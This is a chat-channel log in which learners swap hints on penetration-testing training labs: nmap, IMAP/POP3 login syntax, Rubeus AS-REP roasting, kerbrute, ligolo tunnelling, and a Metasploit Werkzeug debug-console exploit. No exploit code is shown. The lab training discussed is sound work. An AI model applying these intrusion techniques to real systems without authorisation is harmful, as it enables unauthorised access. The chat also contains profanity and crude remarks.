Nmap should generally be the first thing you do
yep got nmap ran
Evaluate the open ports it reveals
You ruled out 22. But the engagement is the big clue: mail server
Then all you need to do is auth to one of them
With what password? Thought all I got was a hash
...
No, you got the plaintext password
It's not a hash
I said it earlier
Output gave you username and password. The name of the .sh file as well should have been the giveaway
Don't make assumptions without ruling things out
is this for imaps/pop3?
Yep
Well the section is the hard lab
If that's what you meant
I pray for you, Marcie, as support
Marcie always here to help
¯\_(ツ)_/¯
Kid is just overthinking the fuck outta this
There was 0 indication that the output was a hash of any kind
Nah
Tbh the hard lab was the easiest one, imo
Simplest chain
The easy was the hardest for me
^
yeah true. I don't remember it, that was 20 modules ago
I just remember I spent some time understanding the lab, but I mean "hardest" is just the most time consumed. I think I spent an hour or so doing it, so
not really hard, just more stuff to get into
My longest time was not reading the engagement clearly
After that it was smooth
So what's the right way to log in to
You have a username and password, refer back to the imap/pop3 section for syntax
Or the cheatsheet
You honestly need to spend more time understanding the given content instead of trying to rush through it
I'm not meaning to come off as rude about it, but that's what it feels like to me
But for a good majority of the skill assessments, it's taught within the module. Or it's a method you learned from a previous module to move forward. I can say with certainty, the Footprinting module skill exams can be done purely with the module section info.
(Sql was a pain in the ass tho)
yea it was
yeah, I feel like if things don't work out after 30 min a lot of people come here to get a hint or ask how to do it just to claim points. Which is wrong, because you don't learn it
Remember that on the exam you can't ask for hints
Which is why I provide hints the way i do
so why not spend the extra min to learn it properly
Get the person to apply knowledge they should have been learning
Automated scripts are only as good as the person using them if you can't follow up with the next steps
A good majority of things can be done without msfconsole too
I usually don't use it. If I can choose between msfconsole or a Python exploit I will go for the Python exploit.
^
I mean it's good and all, but I feel like I learn more from doing it manually than just run4root
Imap requires a prefix before commands
The modules are a good playground for learning
now it just says unknown commands
No, for sure imap always requires a prefix, pop3 doesn't
yeah that might be right
Are you logged in
yea
- or something?
ah yes
It can be anything
oh. noice
this is right isnt it?
I'm in on 995
So my commands don't work
Honestly, I feel like more hints would be a rule break
literally they tell you everything to do in the academy
Literally near the top is pop3 commands
yea none of them work
Underneath the list of imap commands
Elaborate
they def do.
Did you do
USER <name>
PASS <pass>
I give up
hopefully a YouTube walkthrough comes out
It won't
Footprinting is a tier 2 module
Any external content for academy above tier 0 is expressly forbidden
take a break then come back later. Sometimes you just need a break
yea it might be time for that
It was time for that when you were struggling with snmp imo
probably right
Need to start hunting down every way of automation honestly though, and I'm probably going to wanna hang myself when it's time for the Burp Suite and website part
Stop thinking about automation
doing it manually is E minor
Dude
You need to walk before you run
Understanding how these attacks/basic enumeration works can help you better understand any automation tool you use
I definitely know I need a mentor
You need to change your outlook
You're not trying to learn anything you're just trying to push through it
Which will hinder you
This is like making ChatGPT write code for you when you don't know how to program. What will you do when you have an error that says "cannot convert int to bytes"?
like you need to know the basics to understand the debugging
Don't just find an exploit and run it
understand what the exploit is doing, and you will understand what to do if it fails
Yup
Automation only works well if you know what you're doing
The AD modules really do a good job of showcasing "here's how it's done in powershell, but now watch these other tools do it better"
I've sat for 15 hours trying to figure out why my exploit isn't working for a CTF. Like, it's not fun, but you need to understand what's going on. What are you going to do on the exam when you can't ask questions but you need to connect to a "pop3 or imaps" server?
also
why is anyone going to hire you if they can just run the same tools you are running.
Another point: is understanding the output
they pay for your expertise, not the tools
Deciphering what is/isn't useful
Bc sometimes you will run into rabbit holes
Where an enum is just a dead end
I'm trying to not use Metasploit because I'm trying to prepare for the cock and ball torture test
Metasploit isn't everything
I'm trying not to rely on it
And like I said earlier: a lot of stuff can be done without it
yea true
Just figuring the puzzle pieces out and how they fit together is better than some random exploit that you don't know what it does
I don't know if you two would have the time or the patience, but would you guys be my mentors?
Not for free
Already have enough on my plate as is
My free assistance is only here for modules
(Mostly bc I was told I can't charge for help)
fair
Just gotta learn how to interpret output
Bc a lot of the time: the error tells you what's wrong
I dont think mentors are useful for this field
too wide and too many paths to take, so a mentor can only ever aid in a couple aspects
not to mention it's so wide and deep that any mentor is going to be focused on their own learning and journey, not yours
I also don't know shit about fuck
Better to make a bunch of friends and learn from the collected pool of experience
I often see this being recommended tbh, don't really know why
is it just to get free lessons
@thorn urchin btw fun fact, apparently when the ligolo tunnel is running, it messes with the system's ability to query the domain
wdym
I did a rubeus reproast for the hash, and bc I had the tunnel running on the machine I was running the rep from: it kept failing. Stopped the tunnel, it worked
¯\_(ツ)_/¯
that's weird, I can't think of a single reason why that'd matter
Just interesting to know... weird, but interesting
In other news: kerbrute is painfully slow through it
maybe my connection was funky then through the VPN? I might need to test the older version then ¯\_(ツ)_/¯
Cause the new one is kinda clunky
can I dm you for INTRODUCTION TO NOSQL INJECTION skill assessment 2
Hello. Does anybody know how to exploit Werkzeug? I found the /console subdomain, but it's pin-locked. I also tried using Metasploit: exploit/multi/http/werkzeug_debug_rce, but when I run it, it's displaying "Exploit completed, no session created".